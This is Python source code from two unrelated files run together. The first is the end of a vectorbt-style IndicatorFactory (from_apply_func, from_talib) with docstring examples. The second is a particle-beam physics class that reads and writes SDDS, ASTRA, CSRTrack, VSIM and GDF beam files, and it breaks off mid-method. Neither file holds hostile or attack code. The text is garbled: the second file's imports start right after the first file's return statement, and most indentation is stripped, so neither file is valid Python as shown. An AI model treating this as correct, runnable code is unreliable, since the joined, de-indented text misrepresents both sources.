In contrast to `IndicatorFactory.from_custom_func`, this method handles a lot of things for you,
such as caching, parameter selection, and concatenation. Your part is writing a function `apply_func`
that accepts a selection of parameters (single values as opposed to multiple values in
`IndicatorFactory.from_custom_func`) and does the calculation. It then automatically concatenates
the resulting arrays into a single array per output.
        While this approach is simpler, it's also less flexible, since you can only work with
        one parameter selection at a time and can't view all parameters at once. The UDF `apply_func`
        also can't take keyword arguments, nor can it return anything other than the outputs listed
        in `output_names`.
!!! note
If `apply_func` is a Numba-compiled function:
* All inputs are automatically converted to NumPy arrays
* Each argument in `*args` must be of a Numba-compatible type
* You cannot pass keyword arguments
* Your outputs must be arrays of the same shape, data type and data order
Args:
apply_func (callable): A function that takes inputs, selection of parameters, and
other arguments, and does calculations to produce outputs.
Arguments are passed to `apply_func` in the following order:
* `input_shape` if `pass_input_shape` is set to True and `input_shape` not in `kwargs_to_args`
* `col` if `per_column` and `pass_col` are set to True and `col` not in `kwargs_to_args`
* broadcast time-series arrays corresponding to `input_names`
* broadcast in-place output arrays corresponding to `in_output_names`
* single parameter selection corresponding to `param_names`
* variable arguments if `var_args` is set to True
* arguments listed in `kwargs_to_args`
* `flex_2d` if `pass_flex_2d` is set to True and `flex_2d` not in `kwargs_to_args`
* keyword arguments if `apply_func` is not Numba-compiled
Can be Numba-compiled.
!!! note
Shape of each output should be the same and match the shape of each input.
cache_func (callable): A caching function to preprocess data beforehand.
Takes the same arguments as `apply_func`. Should return a single object or a tuple of objects.
All returned objects will be passed unpacked as last arguments to `apply_func`.
Can be Numba-compiled.
pass_packed (bool): Whether to pass packed tuples for inputs, in-place outputs, and parameters.
kwargs_to_args (list of str): Keyword arguments from `kwargs` dict to pass as
positional arguments to the apply function.
Should be used together with `numba_loop` set to True since Numba doesn't support
variable keyword arguments.
Defaults to []. Order matters.
numba_loop (bool): Whether to loop using Numba.
Set to True when iterating large number of times over small input,
but note that Numba doesn't support variable keyword arguments.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
Additionally, each run method now supports `use_ray` argument, which indicates
whether to use Ray to execute `apply_func` in parallel. Only works with `numba_loop` set to False.
See `vectorbt.base.combine_fns.ray_apply` for related keyword arguments.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_custom_func` example.
```python-repl
>>> @njit
... def apply_func_nb(ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1 + arg1, ts2 * p2 + arg2
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_apply_func(
... apply_func_nb, var_args=True,
... kwargs_to_args=['arg2'], arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
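        For illustration (a sketch, not part of the example above), setting `pass_packed=True`
        would hand the same logic packed tuples instead of unpacked arguments:
        ```python-repl
        >>> def apply_func(input_tuple, in_output_tuple, param_tuple, arg1, arg2):
        ...     ts1, ts2 = input_tuple
        ...     p1, p2 = param_tuple
        ...     return ts1 * p1 + arg1, ts2 * p2 + arg2
        ```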
"""
Indicator = self.Indicator
setattr(Indicator, 'apply_func', apply_func)
if kwargs_to_args is None:
kwargs_to_args = []
module_name = self.module_name
output_names = self.output_names
in_output_names = self.in_output_names
param_names = self.param_names
num_ret_outputs = len(output_names)
# Build a function that selects a parameter tuple
# Do it here to avoid compilation with Numba every time custom_func is run
_0 = "i"
_0 += ", args_before"
_0 += ", input_tuple"
if len(in_output_names) > 0:
_0 += ", in_output_tuples"
if len(param_names) > 0:
_0 += ", param_tuples"
_0 += ", *args"
if not numba_loop:
_0 += ", **_kwargs"
_1 = "*args_before"
if pass_packed:
_1 += ", input_tuple"
if len(in_output_names) > 0:
_1 += ", in_output_tuples[i]"
else:
_1 += ", ()"
if len(param_names) > 0:
_1 += ", param_tuples[i]"
else:
_1 += ", ()"
else:
_1 += ", *input_tuple"
if len(in_output_names) > 0:
_1 += ", *in_output_tuples[i]"
if len(param_names) > 0:
_1 += ", *param_tuples[i]"
_1 += ", *args"
if not numba_loop:
_1 += ", **_kwargs"
func_str = "def select_params_func({0}):\n return apply_func({1})".format(_0, _1)
scope = {'apply_func': apply_func}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
select_params_func = scope['select_params_func']
if module_name is not None:
select_params_func.__module__ = module_name
if numba_loop:
select_params_func = njit(select_params_func)
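        # For illustration, with unpacked arguments and a single parameter the generated
        # selector roughly reads:
        #     def select_params_func(i, args_before, input_tuple, param_tuples, *args, **_kwargs):
        #         return apply_func(*args_before, *input_tuple, *param_tuples[i], *args, **_kwargs)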
def custom_func(input_list, in_output_list, param_list, *args, input_shape=None,
col=None, flex_2d=None, return_cache=False, use_cache=None, use_ray=False, **_kwargs):
"""Custom function that forwards inputs and parameters to `apply_func`."""
if use_ray:
if len(in_output_names) > 0:
raise ValueError("Ray doesn't support in-place outputs")
if numba_loop:
if use_ray:
raise ValueError("Ray cannot be used within Numba")
if num_ret_outputs > 1:
apply_and_concat_func = combine_fns.apply_and_concat_multiple_nb
elif num_ret_outputs == 1:
apply_and_concat_func = combine_fns.apply_and_concat_one_nb
else:
apply_and_concat_func = combine_fns.apply_and_concat_none_nb
else:
if num_ret_outputs > 1:
if use_ray:
apply_and_concat_func = combine_fns.apply_and_concat_multiple_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_multiple
elif num_ret_outputs == 1:
if use_ray:
apply_and_concat_func = combine_fns.apply_and_concat_one_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_one
else:
if use_ray:
raise ValueError("Ray requires regular outputs")
apply_and_concat_func = combine_fns.apply_and_concat_none
n_params = len(param_list[0]) if len(param_list) > 0 else 1
input_tuple = tuple(input_list)
in_output_tuples = list(zip(*in_output_list))
param_tuples = list(zip(*param_list))
args_before = ()
if input_shape is not None and 'input_shape' not in kwargs_to_args:
args_before += (input_shape,)
if col is not None and 'col' not in kwargs_to_args:
args_before += (col,)
# Pass some keyword arguments as positional (required by numba)
more_args = ()
for key in kwargs_to_args:
value = _kwargs.pop(key) # important: remove from kwargs
more_args += (value,)
if flex_2d is not None and 'flex_2d' not in kwargs_to_args:
more_args += (flex_2d,)
# Caching
cache = use_cache
if cache is None and cache_func is not None:
_in_output_list = in_output_list
_param_list = param_list
if checks.is_numba_func(cache_func):
if len(in_output_list) > 0:
_in_output_list = [to_typed_list(in_outputs) for in_outputs in in_output_list]
if len(param_list) > 0:
_param_list = [to_typed_list(params) for params in param_list]
cache = cache_func(
*args_before,
*input_tuple,
*_in_output_list,
*_param_list,
*args,
*more_args,
**_kwargs
)
if return_cache:
return cache
if cache is None:
cache = ()
if not isinstance(cache, tuple):
cache = (cache,)
if len(in_output_names) > 0:
_in_output_tuples = in_output_tuples
if numba_loop:
_in_output_tuples = to_typed_list(_in_output_tuples)
_in_output_tuples = (_in_output_tuples,)
else:
_in_output_tuples = ()
if len(param_names) > 0:
_param_tuples = param_tuples
if numba_loop:
_param_tuples = to_typed_list(_param_tuples)
_param_tuples = (_param_tuples,)
else:
_param_tuples = ()
return apply_and_concat_func(
n_params,
select_params_func,
args_before,
input_tuple,
*_in_output_tuples,
*_param_tuples,
*args,
*more_args,
*cache,
**_kwargs
)
return self.from_custom_func(custom_func, as_lists=True, **kwargs)
@classmethod
def from_talib(cls, func_name, init_kwargs=None, **kwargs):
"""Build indicator class around a TA-Lib function.
Requires [TA-Lib](https://github.com/mrjbq7/ta-lib) installed.
For input, parameter and output names, see [docs](https://github.com/mrjbq7/ta-lib/blob/master/docs/index.md).
Args:
func_name (str): Function name.
init_kwargs (dict): Keyword arguments passed to `IndicatorFactory`.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
## Example
```python-repl
>>> SMA = vbt.IndicatorFactory.from_talib('SMA')
>>> sma = SMA.run(price, timeperiod=[2, 3])
>>> sma.real
sma_timeperiod 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.0 2.0
```
To get help on a function, use the `help` command:
```python-repl
>>> help(SMA.run)
Help on method run:
run(close, timeperiod=30, short_name='sma', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance
Run `SMA` indicator.
* Inputs: `close`
* Parameters: `timeperiod`
* Outputs: `real`
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.
```
"""
import talib
from talib import abstract
talib_func = getattr(talib, func_name)
info = abstract.Function(func_name)._Function__info
input_names = []
for in_names in info['input_names'].values():
if isinstance(in_names, (list, tuple)):
input_names.extend(list(in_names))
else:
input_names.append(in_names)
class_name = info['name']
class_docstring = "{}, {}".format(info['display_name'], info['group'])
short_name = info['name'].lower()
param_names = list(info['parameters'].keys())
output_names = info['output_names']
output_flags = info['output_flags']
def apply_func(input_list, _, param_tuple):
# TA-Lib functions can only process 1-dim arrays
n_input_cols = input_list[0].shape[1]
outputs = []
for col in range(n_input_cols):
outputs.append(talib_func(
*map(lambda x: x[:, col], input_list),
*param_tuple
))
if isinstance(outputs[0], tuple): # multiple outputs
outputs = list(zip(*outputs))
return list(map(np.column_stack, outputs))
return np.column_stack(outputs)
TALibIndicator = cls(
**merge_dicts(
dict(
class_name=class_name,
class_docstring=class_docstring,
short_name=short_name,
input_names=input_names,
param_names=param_names,
output_names=output_names,
output_flags=output_flags
),
init_kwargs
)
).from_apply_func(
apply_func,
pass_packed=True,
**info['parameters'],
**kwargs
)
return TALibIndicator
import os, time, csv, sys, subprocess
import copy
import h5py
import numpy as np
import munch
import scipy.constants as constants
from scipy.spatial.distance import cdist
from scipy.spatial import ConvexHull
from scipy.stats import gaussian_kde
from itertools import compress
try:
    import sdds
except ImportError:
    print('sdds failed to load')
sys.path.append(os.path.abspath(__file__+'/../../'))
import SimulationFramework.Modules.read_gdf_file as rgf
import SimulationFramework.Modules.minimumVolumeEllipse as mve
MVE = mve.EllipsoidTool()
class beam(munch.Munch):
particle_mass = constants.m_e
E0 = particle_mass * constants.speed_of_light**2
E0_eV = E0 / constants.elementary_charge
q_over_c = (constants.elementary_charge / constants.speed_of_light)
speed_of_light = constants.speed_of_light
def __init__(self, sddsindex=0):
self.beam = {}
self.sddsindex = sddsindex
def set_particle_mass(self, mass=constants.m_e):
self.particle_mass = mass
def normalise_to_ref_particle(self, array, index=0,subtractmean=False):
array = copy.copy(array)
array[1:] = array[0] + array[1:]
if subtractmean:
            array = array - array[0]  # alternatively: array - np.mean(array)
return array
def reset_dicts(self):
self.beam = {}
self.twiss = {}
self.slice = {}
self._tbins = []
self._pbins = []
def read_SDDS_beam_file(self, fileName, charge=None, ascii=False):
self.reset_dicts()
self.sdds = sdds.SDDS(self.sddsindex)
self.sdds.load(fileName)
for col in range(len(self.sdds.columnName)):
if len(self.sdds.columnData[col]) == 1:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col][0])
else:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col])
self.SDDSparameters = dict()
for param in range(len(self.sdds.parameterName)):
self.SDDSparameters[self.sdds.parameterName[param]] = self.sdds.parameterData[param]
# print 'self.SDDSparameterNames = ', self.SDDSparameterNames
self.beam['code'] = "SDDS"
cp = self.beam['p'] * self.E0_eV
cpz = cp / np.sqrt(self.beam['xp']**2 + self.beam['yp']**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['t'] = self.beam['t']
self.beam['z'] = (-1*self.Bz * constants.speed_of_light) * (self.t-np.mean(self.t)) #np.full(len(self.t), 0)
if 'Charge' in self.SDDSparameters and len(self.SDDSparameters['Charge']) > 0:
self.beam['total_charge'] = self.SDDSparameters['Charge'][0]
elif charge is None:
self.beam['total_charge'] = 0
else:
self.beam['total_charge'] = charge
self.beam['charge'] = []
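    # Usage sketch (illustrative; the file name is a placeholder):
    #     b = beam()
    #     b.read_SDDS_beam_file('beam.sdds')
    #     print(b.beam['total_charge'], len(b.beam['x']))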
def write_SDDS_file(self, filename, ascii=False, xyzoffset=[0,0,0]):
"""Save an SDDS file using the SDDS class."""
xoffset = xyzoffset[0]
yoffset = xyzoffset[1]
zoffset = xyzoffset[2] # Don't think I need this because we are using t anyway...
x = sdds.SDDS(self.sddsindex)
if ascii:
x.mode = x.SDDS_ASCII
else:
x.mode = x.SDDS_BINARY
# {x, xp, y, yp, t, p, particleID}
Cnames = ["x", "xp", "y", "yp", "t","p"]
Ccolumns = ['x', 'xp', 'y', 'yp', 't', 'BetaGamma']
Ctypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE]
Csymbols = ["", "x'","","y'","",""]
Cunits = ["m","","m","","s","m$be$nc"]
Ccolumns = [np.array(self.x) - float(xoffset), self.xp, np.array(self.y) - float(yoffset), self.yp, self.t , self.cp/self.E0_eV]
# {Step, pCentral, Charge, Particles, IDSlotsPerBunch}
Pnames = ["pCentral", "Charge", "Particles"]
Ptypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_LONG]
Psymbols = ["p$bcen$n", "", ""]
Punits = ["m$be$nc", "C", ""]
parameterData = [[np.mean(self.BetaGamma)], [abs(self.beam['total_charge'])], [len(self.x)]]
for i in range(len(Ptypes)):
x.defineParameter(Pnames[i], Psymbols[i], Punits[i],"","", Ptypes[i], "")
x.setParameterValueList(Pnames[i], parameterData[i])
for i in range(len(Ctypes)):
# name, symbol, units, description, formatString, type, fieldLength
x.defineColumn(Cnames[i], Csymbols[i], Cunits[i],"","", Ctypes[i], 0)
x.setColumnValueLists(Cnames[i], [list(Ccolumns[i])])
x.save(filename)
def set_beam_charge(self, charge):
self.beam['total_charge'] = charge
def read_csv_file(self, file, delimiter=' '):
with open(file, 'r') as f:
data = np.array([l for l in csv.reader(f, delimiter=delimiter, quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)])
return data
def write_csv_file(self, file, data):
if sys.version_info[0] > 2:
with open(file, 'w', newline='') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
else:
with open(file, 'wb') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
def read_astra_beam_file(self, file, normaliseZ=False):
starttime = time.time()
self.reset_dicts()
data = self.read_csv_file(file)
# datanp = np.loadtxt(file)
self.interpret_astra_data(data, normaliseZ=normaliseZ)
# def read_hdf5_beam(self, data):
# self.reset_dicts()
# self.interpret_astra_data(data)
def interpret_astra_data(self, data, normaliseZ=False):
x, y, z, cpx, cpy, cpz, clock, charge, index, status = np.transpose(data)
zref = z[0]
self.beam['code'] = "ASTRA"
self.beam['reference_particle'] = data[0]
# if normaliseZ:
# self.beam['reference_particle'][2] = 0
self.beam['longitudinal_reference'] = 'z'
znorm = self.normalise_to_ref_particle(z, subtractmean=True)
z = self.normalise_to_ref_particle(z, subtractmean=False)
cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
clock = self.normalise_to_ref_particle(clock, subtractmean=True)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['clock'] = 1.0e-9*clock
self.beam['charge'] = 1.0e-9*charge
self.beam['index'] = index
self.beam['status'] = status
# print self.Bz
self.beam['t'] = [clock if status == -1 else ((z-zref) / (-1 * Bz * constants.speed_of_light)) for status, z, Bz, clock in zip(self.beam['status'], z, self.Bz, self.beam['clock'])]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = np.sum(self.beam['charge'])
def read_csrtrack_beam_file(self, file):
self.reset_dicts()
data = self.read_csv_file(file)
self.beam['code'] = "CSRTrack"
self.beam['reference_particle'] = data[0]
self.beam['longitudinal_reference'] = 'z'
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
z = self.normalise_to_ref_particle(z, subtractmean=False)
cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['clock'] = np.full(len(self.x), 0)
self.beam['clock'][0] = data[0, 0] * 1e-9
        self.beam['index'] = np.full(len(self.x), 1)
        self.beam['status'] = np.full(len(self.x), 5)
self.beam['t'] = self.z / (-1 * self.Bz * constants.speed_of_light)# [time if status is -1 else 0 for time, status in zip(clock, self.beam['status'])]
self.beam['charge'] = charge
self.beam['total_charge'] = np.sum(self.beam['charge'])
def read_vsim_h5_beam_file(self, filename, charge=70e-12, interval=1):
self.reset_dicts()
with h5py.File(filename, "r") as h5file:
data = np.array(h5file.get('/BeamElectrons'))[1:-1:interval]
z, y, x, cpz, cpy, cpx = data.transpose()
self.beam['code'] = "VSIM"
self.beam['longitudinal_reference'] = 'z'
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.particle_mass
self.beam['py'] = cpy * self.particle_mass
self.beam['pz'] = cpz * self.particle_mass
self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = charge
self.beam['charge'] = []
def read_pacey_beam_file(self, file, charge=250e-12):
self.reset_dicts()
data = self.read_csv_file(file, delimiter='\t')
self.beam['code'] = "TPaceyASTRA"
self.beam['longitudinal_reference'] = 'z'
x, y, z, cpx, cpy, cpz = np.transpose(data)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = charge
self.beam['charge'] = []
def convert_csrtrackfile_to_astrafile(self, csrtrackfile, astrafile):
data = self.read_csv_file(csrtrackfile)
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
charge = -charge*1e9
clock0 = (data[0, 0] / constants.speed_of_light) * 1e9
clock = np.full(len(x), 0)
clock[0] = clock0
index = np.full(len(x), 1)
status = np.full(len(x), 5)
array = np.array([x, y, z, cpx, cpy, cpz, clock, charge, index, status]).transpose()
self.write_csv_file(astrafile, array)
def find_nearest_vector(self, nodes, node):
return cdist([node], nodes).argmin()
def rms(self, x, axis=None):
return np.sqrt(np.mean(x**2, axis=axis))
def create_ref_particle(self, array, index=0, subtractmean=False):
array[1:] = array[0] + array[1:]
if subtractmean:
array = array - np.mean(array)
return array
def write_astra_beam_file(self, file, index=1, status=5, charge=None, normaliseZ=False):
        # Build the per-particle charge vector in nC; use per-particle charges when
        # available, otherwise distribute the total charge evenly over the macroparticles
        if len(self.beam['charge']) == len(self.x):
            chargevector = 1e9*self.beam['charge']
        else:
            chargevector = np.full(len(self.x), 1e9*self.charge/len(self.x))
        if not isinstance(index, (list, tuple, np.ndarray)):
            indexvector = np.full(len(self.x), index)
        else:
            indexvector = np.array(index)
statusvector = self.beam['status'] if 'status' in self.beam else status if isinstance(status,(list, tuple, np.ndarray)) else np.full(len(self.x), status)
        ''' if a particle is emitted from the cathode, its z value is 0 and its clock value is finite; otherwise z is finite and clock is irrelevant (and thus zero) '''
if self.beam['longitudinal_reference'] == 't':
zvector = [0 if status == -1 and t == 0 else z for status, z, t in zip(statusvector, self.z, self.t)]
else:
zvector = self.z
''' if the clock value is finite, we calculate it from the z value, using Betaz '''
# clockvector = [1e9*z / (1 * Bz * constants.speed_of_light) if status == -1 and t == 0 else 1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
clockvector = [1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
        ''' this is the ASTRA array in all its glory '''
array = np.array([self.x, self.y, zvector, self.cpx, self.cpy, self.cpz, clockvector, chargevector, indexvector, statusvector]).transpose()
if 'reference_particle' in self.beam:
ref_particle = self.beam['reference_particle']
# print 'we have a reference particle! ', ref_particle
# np.insert(array, 0, ref_particle, axis=0)
else:
            ''' take the rms - if the rms is 0, set it to 1 so we don't get a divide-by-zero error '''
rms_vector = [a if abs(a) > 0 else 1 for a in self.rms(array, axis=0)]
''' normalise the array '''
norm_array = array / rms_vector
            ''' take the mean of the normalised array '''
mean_vector = np.mean(norm_array, axis=0)
''' find the index of the vector that is closest to the mean - if you read in an ASTRA file, this should actually return the reference particle! '''
            nearest_idx = self.find_nearest_vector(norm_array, mean_vector)
ref_particle = array[nearest_idx]
''' set the closest mean vector to be in position 0 in the array '''
array = np.roll(array, -1*nearest_idx, axis=0)
''' normalise Z to the reference particle '''
array[1:,2] = array[1:,2] - ref_particle[2]
''' should we leave Z as the reference value, set it to 0, or set it to be some offset? '''
        if normaliseZ is not False:
array[0,2] = 0
if not isinstance(normaliseZ,(bool)):
array[0,2] += normaliseZ
''' normalise pz and the clock '''
# print('Mean pz = ', np.mean(array[:,5]))
array[1:,5] = array[1:,5] - ref_particle[5]
array[0,6] = array[0,6] + ref_particle[6]
np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%d','%d'))
def write_vsim_beam_file(self, file, normaliseT=False):
if len(self.beam['charge']) == len(self.x):
chargevector = self.beam['charge']
else:
chargevector = np.full(len(self.x), self.beam['total_charge']/len(self.x))
if normaliseT:
tvector = self.t - np.mean(self.t)
zvector = self.z - np.mean(self.z)
else:
tvector = self.t
zvector = self.z
zvector = [t * (1 * Bz * constants.speed_of_light) if z == 0 else z for z, t, Bz in zip(zvector, tvector, self.Bz)]
        ''' this is the VSIM array in all its glory '''
array = np.array([zvector, self.y, self.x, self.Bz*self.gamma*constants.speed_of_light, self.By*self.gamma*constants.speed_of_light, self.Bx*self.gamma*constants.speed_of_light]).transpose()
np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'))
def write_gdf_beam_file(self, filename, normaliseZ=False):
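        ''' write a GDF-style ASCII file (columns x y z q m nmacro GBx GBy GBz); the particles are assumed to be electrons '''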
q = np.full(len(self.x), -1 * constants.elementary_charge)
m = np.full(len(self.x), constants.electron_mass)
nmacro = np.full(len(self.x), abs(self.beam['total_charge'] / constants.elementary_charge / len(self.x)))
toffset = np.mean(self.z / (self.Bz * constants.speed_of_light))
z = self.z if not normaliseZ else (self.z - np.mean(self.z))
dataarray = np.array([self.x, self.y, z, q, m, nmacro, self.gamma*self.Bx, self.gamma*self.By, self.gamma*self.Bz]).transpose()
namearray = 'x y z q m nmacro GBx GBy GBz'
np.savetxt(filename, dataarray, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'), header=namearray, comments='')
def read_gdf_beam_file_object(self, file):
if isinstance(file, (str)):
gdfbeam = rgf.read_gdf_file(file)
elif isinstance(file, (rgf.read_gdf_file)):
gdfbeam = file
else:
raise Exception('file is not str or gdf object!')
return gdfbeam
def calculate_gdf_s(self, file):
gdfbeam = self.read_gdf_beam_file_object(file)
datagrab = gdfbeam.get_grab(0)
avgt = [datagrab.avgt]
position = [datagrab.position]
sposition = list(zip(*list(sorted(zip(avgt[0], position[0])))))[1]
ssposition = list(zip(sposition, list(sposition[1:])+[0]))
offset = 0
spos = []
for p1,p2 in ssposition:
spos += [p1 + offset]
if p2 < p1:
offset += p1
return spos
def calculate_gdf_eta(self, file):
gdfbeam = self.read_gdf_beam_file_object(file)
etax = []
etaxp = []
tp = []
for p in gdfbeam.positions:
self.read_gdf_beam_file(gdfbeam=gdfbeam, position=p)
if len(self.x) > 0:
e, ep, t = self.calculate_etax()
etax += [e]
etaxp += [ep]
tp += [t]
etax, etaxp = list(zip(*list(sorted(zip(tp, etax, etaxp)))))[1:]
return etax, etaxp
def read_gdf_beam_file_info(self, file):
self.reset_dicts()
gdfbeamdata = None
gdfbeam = self.read_gdf_beam_file_object(file)
print('grab_groups = ', gdfbeam.grab_groups)
        print('Positions = ', gdfbeam.positions)
        print('Times = ', gdfbeam.times)
def read_gdf_beam_file(self, file=None, position=None, time=None, block=None, charge=None, longitudinal_reference='t', gdfbeam=None):
self.reset_dicts()
if gdfbeam is None and not file is None:
gdfbeam = self.read_gdf_beam_file_object(file)
elif gdfbeam is None and file is None:
return None
        if position is not None:
# print 'Assuming position over time!'
self.beam['longitudinal_reference'] = 't'
gdfbeamdata = gdfbeam.get_position(position)
if gdfbeamdata is not None:
# print('GDF found position ', position)
time = None
block = None
else:
print('GDF DID NOT find position ', position)
position = None
elif position is None and time is not None and block is not None:
# print 'Assuming time over block!'
self.beam['longitudinal_reference'] = 'p'
gdfbeamdata = gdfbeam.get_time(time)
if gdfbeamdata is not None:
block = None
else:
time = None
elif position is None and time is None and block is not None:
gdfbeamdata = gdfbeam.get_grab(block)
if gdfbeamdata is None:
block = None
elif position is None and time is None and block is None:
gdfbeamdata = gdfbeam.get_grab(0)
self.beam['code'] = "GPT"
self.beam['x'] = gdfbeamdata.x
self.beam['y'] = gdfbeamdata.y
if hasattr(gdfbeamdata,'z') and longitudinal_reference == 'z':
# print( 'z!')
# print(( gdfbeamdata.z))
self.beam['z'] = gdfbeamdata.z
self.beam['t'] = np.full(len(self.z), 0)# self.z / (-1 * self.Bz * constants.speed_of_light)
elif hasattr(gdfbeamdata,'t') and longitudinal_reference == 't':
# print( 't!')
self.beam['t'] = gdfbeamdata.t
self.beam['z'] = (-1 * gdfbeamdata.Bz * constants.speed_of_light) * (gdfbeamdata.t-np.mean(gdfbeamdata.t)) + gdfbeamdata.z
self.beam['gamma'] = gdfbeamdata.G
if hasattr(gdfbeamdata,'q') and hasattr(gdfbeamdata,'nmacro'):
self.beam['charge'] = gdfbeamdata.q * gdfbeamdata.nmacro
self.beam['total_charge'] = np.sum(self.beam['charge'])
else:
if charge is None:
self.beam['total_charge'] = 0
else:
self.beam['total_charge'] = charge
# print(( self.beam['charge']))
vx = gdfbeamdata.Bx * constants.speed_of_light
vy = gdfbeamdata.By * constants.speed_of_light
vz = gdfbeamdata.Bz * constants.speed_of_light
velocity_conversion = 1 / (constants.m_e * self.beam['gamma'])
self.beam['px'] = vx / velocity_conversion
self.beam['py'] = vy / velocity_conversion
self.beam['pz'] = vz / velocity_conversion
return gdfbeam
def rotate_beamXZ(self, theta, preOffset=[0,0,0], postOffset=[0,0,0]):
preOffset=np.array(preOffset)
postOffset=np.array(postOffset)
rotation_matrix = np.array([[np.cos(theta), 0, np.sin(theta)], [0, 1, 0], [-1*np.sin(theta), 0, np.cos(theta)]])
beam = np.array([self.x,self.y,self.z]).transpose()
self.beam['x'],self.beam['y'],self.beam['z'] = (np.dot(beam-preOffset, rotation_matrix)-postOffset).transpose()
beam = np.array([self.px, self.py, self.pz]).transpose()
self.beam['px'], self.beam['py'], self.beam['pz'] = np.dot(beam, rotation_matrix).transpose()
if 'reference_particle' in self.beam:
beam = np.array([self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2]])
self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2] = (np.dot([beam-preOffset], rotation_matrix)[0]-postOffset)
# print 'rotated ref part = ', np.dot([beam-preOffset], rotation_matrix)[0]
beam = np.array([self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5]])
self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5] = np.dot([beam], rotation_matrix)[0]
self.beam['rotation'] = theta
self.beam['offset'] = preOffset
def unrotate_beamXZ(self):
offset = self.beam['offset'] if 'offset' in self.beam else np.array([0,0,0])
        if 'rotation' in self.beam and abs(self.beam['rotation']) > 0:  # 'and': guard the key lookup before testing the value
self.rotate_beamXZ(-1*self.beam['rotation'], -1*offset)
def write_HDF5_beam_file(self, filename, centered=False, mass=constants.m_e, sourcefilename=None, pos=None, rotation=None, longitudinal_reference='t', zoffset=0):
# print('zoffset = ', zoffset, type(zoffset))
